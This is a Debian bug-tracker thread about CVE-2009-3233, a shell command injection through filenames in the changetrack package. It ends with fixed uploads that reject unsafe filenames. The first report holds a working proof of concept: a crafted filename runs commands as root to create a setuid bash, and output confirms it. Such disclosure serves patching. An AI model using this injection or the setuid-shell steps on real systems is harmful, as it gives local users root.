Acknowledgement sent
to Marek Grzybowski <marek.grzybowski@atm.com.pl>:
New Bug report received and forwarded. Copy sent to team@security.debian.org, secure-testing-team@lists.alioth.debian.org, Jens Peter Secher <jps@debian.org>.
(Tue, 15 Sep 2009 19:27:07 GMT) (full text, mbox, link).
From: Marek Grzybowski <marek.grzybowski@atm.com.pl>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: changetrack: shell command injection via filename
Date: Tue, 15 Sep 2009 21:23:28 +0200
Package: changetrack
Version: 4.3-3
Severity: grave
Tags: security
Justification: user security hole
-- System Information:
Debian Release: 5.0.2
APT prefers stable
APT policy: (500, 'stable')
Architecture: amd64 (x86_64)
Kernel: Linux 2.6.26-2-openvz-amd64 (SMP w/3 CPU cores)
Locale: LANG=pl_PL.UTF-8, LC_CTYPE=pl_PL.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash
Versions of packages changetrack depends on:
ii libfile-ncopy-perl 0.34-1 file copying like cp for perl
ii perl 5.10.0-19 Larry Wall's Practical Extraction
Versions of packages changetrack recommends:
ii cron 3.0pl1-105 management of regular background p
ii ed 0.7-3 The classic unix line editor
changetrack suggests no packages.
-- no debconf information
Its is posible, to run commands as root, if you have permision to create
files in directory chcked via changetrack, example:
mkdir /etc/test
touch "/etc/test/sth
echo commmand u like most
cd ..
cd ..
cd ..
cd ..
cd bin
cp bash bash.ultimate
chmod ug+s bash.ultimate
"
echo "/etc/test/*" >> /etc/changetrack.conf
wait for /etc/cron.hourly/changetrack
# ls -al /bin/bash.ultimate
-rwsr-sr-x 1 root root 797784 wrz 15 20:52 /bin/bash.ultimate
bash.ultimate -p ;)
Probably changetrack shudnot use shell commands, or escape sh special
haracters like spaces enters ; etc...
--
Regards
Marek Grzybowski
Message sent on
to Marek Grzybowski <marek.grzybowski@atm.com.pl>:
Bug#546791.
(Wed, 16 Sep 2009 19:42:11 GMT) (full text, mbox, link).
Subject: changetrack: shell command injection via filename
Date: Wed, 16 Sep 2009 21:39:20 +0200
Thanks for the bug report.
I am considering applying the following fix:
if( "$realfile" =~ m/[\r\n\f<>`\$]/ ) {
if(!$opt_q)
{ print "Skipping non-sane filename '$realfile'\n";}
@diff = (@diff, "Non-sane: '$realfile'\n");
next;
}
for outright rejecting weird filenames. Can you come up with other
problematic characters in filenames?
Cheers,
--
Jens Peter Secher.
_DD6A 05B0 174E BFB2 D4D9 B52E 0EE5 978A FE63 E8A1 jpsecher gmail com_.
A. Because it breaks the logical sequence of discussion.
Q. Why is top posting bad?
Information forwarded
to debian-bugs-dist@lists.debian.org, Jens Peter Secher <jps@debian.org>: Bug#546791; Package changetrack.
(Thu, 17 Sep 2009 07:42:26 GMT) (full text, mbox, link).
Acknowledgement sent
to Giuseppe Iuculano <giuseppe@iuculano.it>:
Extra info received and forwarded to list. Copy sent to Jens Peter Secher <jps@debian.org>.
(Thu, 17 Sep 2009 07:42:27 GMT) (full text, mbox, link).
Changed Bug title to 'CVE-2009-3233: shell command injection via filename' from 'changetrack: shell command injection via filename'
Request was from Giuseppe Iuculano <giuseppe@iuculano.it>
to control@bugs.debian.org.
(Thu, 17 Sep 2009 07:42:32 GMT) (full text, mbox, link).
Acknowledgement sent
to Marek Grzybowski <marek.grzybowski@atm.com.pl>:
Extra info received and filed, but not forwarded.
(Thu, 17 Sep 2009 08:18:07 GMT) (full text, mbox, link).
Cc: Andrzej Lemieszek <andrzej.lemieszek@atm.com.pl>
Subject: Re: Bug#546791: changetrack: shell command injection via filename
Date: Thu, 17 Sep 2009 19:43:57 +0200
2009/9/17 Marek Grzybowski <marek.grzybowski@atm.com.pl>:
>
> Andrzej Lemieszek (in CC) found few more, and He escaped them, so use rcs should be safe to:
>
> His patch:
>
[...]
> + my $realfile_esc = &escape_shell_chars ($realfile);
[...]
> - `cp $realfile $compfile`;
> + `cp $realfile_esc $compfile_esc`;
[...]
> +sub escape_shell_chars
> +{
> + my $arg = shift;
> + $arg =~ s/[;<>\*\|`&\$!#\(\)\[\]\{\}:'"\s]/\\$&/g;
> + return $arg;
> +}
This is not going work. When $realfile_esc is different from
$realfile, then it makes no sense to copy the non-existent
$realfile_esc. I will go for the solution of rejecting weird file
names.
Cheers,
--
Jens Peter Secher.
_DD6A 05B0 174E BFB2 D4D9 B52E 0EE5 978A FE63 E8A1 jpsecher gmail com_.
A. Because it breaks the logical sequence of discussion.
Q. Why is top posting bad?
Message sent on
to Marek Grzybowski <marek.grzybowski@atm.com.pl>:
Bug#546791.
(Thu, 17 Sep 2009 21:03:04 GMT) (full text, mbox, link).
Subject: Re: Bug#546791: changetrack: shell command injection via filename
Date: Thu, 17 Sep 2009 22:54:37 +0200
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Jens Peter Secher pisze:
> 2009/9/17 Marek Grzybowski <marek.grzybowski@atm.com.pl>:
>> Andrzej Lemieszek (in CC) found few more, and He escaped them, so use rcs should be safe to:
>>
>> His patch:
>>
> [...]
>> + my $realfile_esc = &escape_shell_chars ($realfile);
> [...]
>> - `cp $realfile $compfile`;
>> + `cp $realfile_esc $compfile_esc`;
> [...]
>> +sub escape_shell_chars
>> +{
>> + my $arg = shift;
>> + $arg =~ s/[;<>\*\|`&\$!#\(\)\[\]\{\}:'"\s]/\\$&/g;
>> + return $arg;
>> +}
>
> This is not going work. When $realfile_esc is different from
> $realfile, then it makes no sense to copy the non-existent
> $realfile_esc. I will go for the solution of rejecting weird file
> names.
I'm sorry, but it works. $realfile_esc is translated back by shell to
it's original filename and target program (cp in this case) opens $realfile.
Of course, rejecting weird names is also solution, but after such modification changetrack
still will not handle correctly files with characters mentioned above ( sometimes these filenames
are created by not malicious user e.g. filenames with spaces)
- --
Andrzej Lemieszek - Zespół Wsparcia Systemów i Aplikacji
ATM S.A., ul. Grochowska 21a, 04-186 Warszawa, Poland; http://www.atm.com.pl
tel. +48 22 5156357; PGP key ID: 0xD8A5913F
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iGUEARECACUFAkqyofceGGhrcDovL3Bvb2wuc2tzLWtleXNlcnZlcnMubmV0AAoJ
EFA6R1rYpZE/rS0An0HMDJS4CRgP0NCm7eIVpAwyqT9GAJ9VP7LSuKvprN9kbi10
KhbumazHbw==
=c4HU
-----END PGP SIGNATURE-----
Acknowledgement sent
to Marek Grzybowski <marek.grzybowski@atm.com.pl>:
Extra info received and filed, but not forwarded.
(Thu, 17 Sep 2009 21:54:03 GMT) (full text, mbox, link).
From: Marek Grzybowski <marek.grzybowski@atm.com.pl>
To: Jens Peter Secher <jps@debian.org>, 546791-quiet@bugs.debian.org
Cc: 546791-submitter@bugs.debian.org,
Andrzej Lemieszek <andrzej.lemieszek@atm.com.pl>
Subject: Re: Bug#546791: changetrack: shell command injection via filename
Date: Thu, 17 Sep 2009 23:49:15 +0200
Jens Peter Secher wrote:
> 2009/9/17 Marek Grzybowski <marek.grzybowski@atm.com.pl>:
>> Andrzej Lemieszek (in CC) found few more, and He escaped them, so use rcs should be safe to:
>>
>> His patch:
>>
> [...]
>> + my $realfile_esc = &escape_shell_chars ($realfile);
> [...]
>> - `cp $realfile $compfile`;
>> + `cp $realfile_esc $compfile_esc`;
> [...]
>> +sub escape_shell_chars
>> +{
>> + my $arg = shift;
>> + $arg =~ s/[;<>\*\|`&\$!#\(\)\[\]\{\}:'"\s]/\\$&/g;
>> + return $arg;
>> +}
>
> This is not going work. When $realfile_esc is different from
> $realfile, then it makes no sense to copy the non-existent
> $realfile_esc. I will go for the solution of rejecting weird file
> names.
You right Jeans, it's no good enought witch "enters",
I also chcked ./bashline.c in bash sources:
/* characters that need to be quoted when appearing in filenames. */
rl_filename_quote_characters = " \t\n\\\"'@<>=;|&()#$`?*[!:{"; /*}*/
i do some tests, and come up witch this :
$ cat test.pl
#!/usr/bin/perl
use File::NCopy qw(copy);
# test file name
my $realfile="blablabla \t\n\\\"'@<>=;|&()#\$`?*[!:{";
my $realfile_esc = &escape_shell_chars ($realfile);
sub escape_shell_chars
{
my $arg = shift;
$arg =~ s/[']/\'\\$&'/g;
return "'".$arg."'";
}
print "$realfile\n";
print "$realfile_esc\n";
copy( "test.pl" , $realfile);
print `set -x cp test.pl $realfile_esc`
--
Pozdrawiam
Marek Grzybowski
Message sent on
to Marek Grzybowski <marek.grzybowski@atm.com.pl>:
Bug#546791.
(Thu, 17 Sep 2009 21:54:05 GMT) (full text, mbox, link).
Reply sent
to Jens Peter Secher <jps@debian.org>:
You have taken responsibility.
(Thu, 17 Sep 2009 22:39:43 GMT) (full text, mbox, link).
Notification sent
to Marek Grzybowski <marek.grzybowski@atm.com.pl>:
Bug acknowledged by developer.
(Thu, 17 Sep 2009 22:39:43 GMT) (full text, mbox, link).
Source: changetrack
Source-Version: 4.5-2
We believe that the bug you reported is fixed in the latest version of
changetrack, which is due to be installed in the Debian FTP archive:
changetrack_4.5-2.diff.gz
to pool/main/c/changetrack/changetrack_4.5-2.diff.gz
changetrack_4.5-2.dsc
to pool/main/c/changetrack/changetrack_4.5-2.dsc
changetrack_4.5-2_all.deb
to pool/main/c/changetrack/changetrack_4.5-2_all.deb
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 546791@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Jens Peter Secher <jps@debian.org> (supplier of updated changetrack package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Format: 1.8
Date: Thu, 17 Sep 2009 22:32:43 +0200
Source: changetrack
Binary: changetrack
Architecture: source all
Version: 4.5-2
Distribution: unstable
Urgency: low
Maintainer: Jens Peter Secher <jps@debian.org>
Changed-By: Jens Peter Secher <jps@debian.org>
Description:
changetrack - monitor changes to (configuration) files
Closes: 546791
Changes:
changetrack (4.5-2) unstable; urgency=low
.
* [reject-weird-filenames.diff] Fix possible local exploit by rejecting
filenames with unsafe characters (cf. CVE-2009-3233). Thanks to Marek
Grzybowski and Andrzej Lemieszek.
(Closes: #546791)
Checksums-Sha1:
3f8c484862fe780799cb222e9e167060f816380d 1203 changetrack_4.5-2.dsc
dd2276879e4e4978bcd8719305257883110c283b 13966 changetrack_4.5-2.diff.gz
bd6371b033eb49bb87c3671c6c8a62df1331f0b0 22160 changetrack_4.5-2_all.deb
Checksums-Sha256:
66ae538c9a129c6cde8d5030a367990d885cc2f8e340641fb2fabd5d649264c3 1203 changetrack_4.5-2.dsc
8c43f60545ad78d1c42605f7e507121c4e2d607d0bf280cbd56c518a0ceb1343 13966 changetrack_4.5-2.diff.gz
e25d8c2c03e2a821025b9afe3da60dcd4e13d8827420f315ab898c891c7ee0d4 22160 changetrack_4.5-2_all.deb
Files:
6453dd7fb96ed8f2cc5cf00b6a4e305a 1203 utils optional changetrack_4.5-2.dsc
28ed49102de02d769d67315616be21d0 13966 utils optional changetrack_4.5-2.diff.gz
489f18c7e76e6f00db07691d0ad178ef 22160 utils optional changetrack_4.5-2_all.deb
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10rc1 (GNU/Linux)
iJwEAQECAAYFAkqynasACgkQiFVdEFPVQL/C1AQAw56DBodzOh/hxvp9I3bBMi39
tYXGDnAyDF/6XkAf3zOvm5pAbuVTmazucEeiTvU+z6nNywKY71fnzEGQOaEqm5Vd
draYAes9ibVdpC+FB5Ps870gBMrJxO10tp+4oYp4s0w7ocwX8kECRAlmf4GTb1pX
rQqRLf/e6zeebf0m4hc=
=gUE0
-----END PGP SIGNATURE-----
Acknowledgement sent
to Andrzej Lemieszek <andrzej.lemieszek@atm.com.pl>:
Extra info received and filed, but not forwarded.
(Fri, 18 Sep 2009 00:36:14 GMT) (full text, mbox, link).
From: Andrzej Lemieszek <andrzej.lemieszek@atm.com.pl>
To: Marek Grzybowski <marek.grzybowski@atm.com.pl>
Cc: Jens Peter Secher <jps@debian.org>, 546791-quiet@bugs.debian.org,
546791-submitter@bugs.debian.org
Subject: Re: Bug#546791: changetrack: shell command injection via filename
Date: Fri, 18 Sep 2009 02:25:29 +0200
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Marek Grzybowski pisze:
> Jens Peter Secher wrote:
>> 2009/9/17 Marek Grzybowski <marek.grzybowski@atm.com.pl>:
(...)
>>> Andrzej Lemieszek (in CC) found few more, and He escaped them, so use rcs should be safe to:
>>>
>>> His patch:
>>>
>> [...]
>>> + my $realfile_esc = &escape_shell_chars ($realfile);
>> [...]
>>> - `cp $realfile $compfile`;
>>> + `cp $realfile_esc $compfile_esc`;
>> [...]
>>> +sub escape_shell_chars
>>> +{
>>> + my $arg = shift;
>>> + $arg =~ s/[;<>\*\|`&\$!#\(\)\[\]\{\}:'"\s]/\\$&/g;
>>> + return $arg;
>>> +}
>> This is not going work. When $realfile_esc is different from
>> $realfile, then it makes no sense to copy the non-existent
>> $realfile_esc. I will go for the solution of rejecting weird file
>> names.
>
> You right Jeans, it's no good enought witch "enters",
>
> I also chcked ./bashline.c in bash sources:
>
> /* characters that need to be quoted when appearing in filenames. */
> rl_filename_quote_characters = " \t\n\\\"'@<>=;|&()#$`?*[!:{"; /*}*/
>
> i do some tests, and come up witch this :
Yeah, Marku, you are right. I didn't test my patch with newline characters (I used semicolons for
testing your exploit), so I didn't notice that newline is a "special case" of special characters
(see bash(1), section QUOTING) and can't be easly quoted using backslash
Your solution using single quotes is much better ( it smartly overrides the limitation of single
quotes - that inside single quoted string single quotes can't be escaped), In the shorter form it
can look like this:
sub escape_shell_chars
{
my $arg = shift;
$arg =~ s/'/'\\''/g;
return "'$arg'";
}
- --
Andrzej Lemieszek
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iGUEARECACUFAkqy03keGGhrcDovL3Bvb2wuc2tzLWtleXNlcnZlcnMubmV0AAoJ
EFA6R1rYpZE/eGUAn38bCS8TccE82Tg2VZ+beXhIfIpQAJ9q4FO4jF0GxOCXT67Z
KHqOeLq8gQ==
=wiP3
-----END PGP SIGNATURE-----
Message sent on
to Marek Grzybowski <marek.grzybowski@atm.com.pl>:
Bug#546791.
(Fri, 18 Sep 2009 00:36:15 GMT) (full text, mbox, link).
Reply sent
to Jens Peter Secher <jps@debian.org>:
You have taken responsibility.
(Thu, 24 Sep 2009 02:36:03 GMT) (full text, mbox, link).
Notification sent
to Marek Grzybowski <marek.grzybowski@atm.com.pl>:
Bug acknowledged by developer.
(Thu, 24 Sep 2009 02:36:03 GMT) (full text, mbox, link).
Subject: Bug#546791: fixed in changetrack 4.3-3+etch1
Date: Thu, 24 Sep 2009 01:57:50 +0000
Source: changetrack
Source-Version: 4.3-3+etch1
We believe that the bug you reported is fixed in the latest version of
changetrack, which is due to be installed in the Debian FTP archive:
changetrack_4.3-3+etch1.diff.gz
to pool/main/c/changetrack/changetrack_4.3-3+etch1.diff.gz
changetrack_4.3-3+etch1.dsc
to pool/main/c/changetrack/changetrack_4.3-3+etch1.dsc
changetrack_4.3-3+etch1_all.deb
to pool/main/c/changetrack/changetrack_4.3-3+etch1_all.deb
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 546791@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Jens Peter Secher <jps@debian.org> (supplier of updated changetrack package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Format: 1.7
Date: Thu, 17 Sep 2009 22:32:43 +0200
Source: changetrack
Binary: changetrack
Architecture: source all
Version: 4.3-3+etch1
Distribution: oldstable-security
Urgency: medium
Maintainer: Jens Peter Secher <jps@debian.org>
Changed-By: Jens Peter Secher <jps@debian.org>
Description:
changetrack - configuration-file change tracker
Closes: 546791
Changes:
changetrack (4.3-3+etch1) oldstable-security; urgency=medium
.
* Fix possible local exploit by rejecting filenames with unsafe
characters (cf. CVE-2009-3233). Thanks to Marek Grzybowski and
Andrzej Lemieszek.
(Closes: #546791)
Files:
b519ffa08cb165819e9bdd67f7e9a4f3 710 utils optional changetrack_4.3-3+etch1.dsc
3334d9ef744a08cc0b4d8253c78b7c10 13330 utils optional changetrack_4.3-3+etch1.diff.gz
b1002889940ab122879f4d709fe8a573 21706 utils optional changetrack_4.3-3+etch1_all.deb
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10rc1 (GNU/Linux)
iJwEAQECAAYFAkq2Zp8ACgkQiFVdEFPVQL/TagP9EUfyPWHxaOg+1R12oD3GBpGo
KT/avbj+06eCCQMwgBUdSpPYN/BBdV7N/xL67/sVk2NBMlm8vCcuQlj851t2DHU3
7M/A4R1rgMRybh0gT62MWdpaNs4OonhgKdangO5CWmUq1gD7G+Lc9+T5H15dU/pB
/r8CnXxEzHf+7tQrsFk=
=fCDZ
-----END PGP SIGNATURE-----
Reply sent
to Jens Peter Secher <jps@debian.org>:
You have taken responsibility.
(Wed, 16 Dec 2009 23:42:03 GMT) (full text, mbox, link).
Notification sent
to Marek Grzybowski <marek.grzybowski@atm.com.pl>:
Bug acknowledged by developer.
(Wed, 16 Dec 2009 23:42:03 GMT) (full text, mbox, link).
Subject: Bug#546791: fixed in changetrack 4.3-3+lenny1
Date: Wed, 16 Dec 2009 23:38:46 +0000
Source: changetrack
Source-Version: 4.3-3+lenny1
We believe that the bug you reported is fixed in the latest version of
changetrack, which is due to be installed in the Debian FTP archive:
changetrack_4.3-3+lenny1.diff.gz
to main/c/changetrack/changetrack_4.3-3+lenny1.diff.gz
changetrack_4.3-3+lenny1.dsc
to main/c/changetrack/changetrack_4.3-3+lenny1.dsc
changetrack_4.3-3+lenny1_all.deb
to main/c/changetrack/changetrack_4.3-3+lenny1_all.deb
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 546791@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Jens Peter Secher <jps@debian.org> (supplier of updated changetrack package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Format: 1.8
Date: Thu, 17 Sep 2009 22:32:43 +0200
Source: changetrack
Binary: changetrack
Architecture: source all
Version: 4.3-3+lenny1
Distribution: stable-security
Urgency: medium
Maintainer: Jens Peter Secher <jps@debian.org>
Changed-By: Jens Peter Secher <jps@debian.org>
Description:
changetrack - configuration-file change tracker
Closes: 546791
Changes:
changetrack (4.3-3+lenny1) stable-security; urgency=medium
.
* Fix possible local exploit by rejecting filenames with unsafe
characters (cf. CVE-2009-3233). Thanks to Marek Grzybowski and
Andrzej Lemieszek.
(Closes: #546791)
Checksums-Sha1:
4645f9452c04d593cf24cfb49da6c22594b8143a 1110 changetrack_4.3-3+lenny1.dsc
820410611c2520f39653b9f50f149dfa632a421e 16567 changetrack_4.3.orig.tar.gz
0fcd2813562a9942189fbd1eeeee2f39848bc4fb 13325 changetrack_4.3-3+lenny1.diff.gz
f1afc814784c9f1975c94610fb55bb89a58ad841 21678 changetrack_4.3-3+lenny1_all.deb
Checksums-Sha256:
e106ada0d20a1afeb86d1c5e840b83b3f0bc3001c1f3621bbbbc87b2da1900e3 1110 changetrack_4.3-3+lenny1.dsc
016d7817dcc6840ae50d9f4a1917679087765b7985cfc5eb088d68b8270ff5c7 16567 changetrack_4.3.orig.tar.gz
defe00ae7b26f299437b8a18dabed1e0568fe3fe8aaf96af9e6793d9fa221a08 13325 changetrack_4.3-3+lenny1.diff.gz
12f0d22ad6f56e3798c4547656a6bfc7962de09b67192a69734b9c9fdbfd199c 21678 changetrack_4.3-3+lenny1_all.deb
Files:
5e689f11bc4dca83328cda0a888ec1e4 1110 utils optional changetrack_4.3-3+lenny1.dsc
7600e72b299562c6773e9b6ac38aaa55 16567 utils optional changetrack_4.3.orig.tar.gz
c91d4a3d370dfe41ff41e6815eda7440 13325 utils optional changetrack_4.3-3+lenny1.diff.gz
3b9fb111a49aa671886f6e5eaec66908 21678 utils optional changetrack_4.3-3+lenny1_all.deb
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10rc1 (GNU/Linux)
iJwEAQECAAYFAkq2ZAkACgkQiFVdEFPVQL90WAQAwSBJo6ZUl4A+IrDU4go0GdE3
ZG9fOXw2ddxKysp02M/11SpFMRhIQcN5di8i+jMyZKRjnFjtnO4tVK985r+owbI0
XHfrENbzoEl8Am5PCXD1WwG6N4nnfb+AOdPtX3GyNpNV+Me+of0in+AKBaEPIoN8
f3W6ZehlsUWZk/MRoxM=
=Gd/E
-----END PGP SIGNATURE-----
Bug archived.
Request was from Debbugs Internal Request <owner@bugs.debian.org>
to internal_control@bugs.debian.org.
(Sun, 31 Jan 2010 07:42:22 GMT) (full text, mbox, link).
Debbugs is free software and licensed under the terms of the GNU General
Public License version 2. The current version can be obtained
from https://bugs.debian.org/debbugs-source/.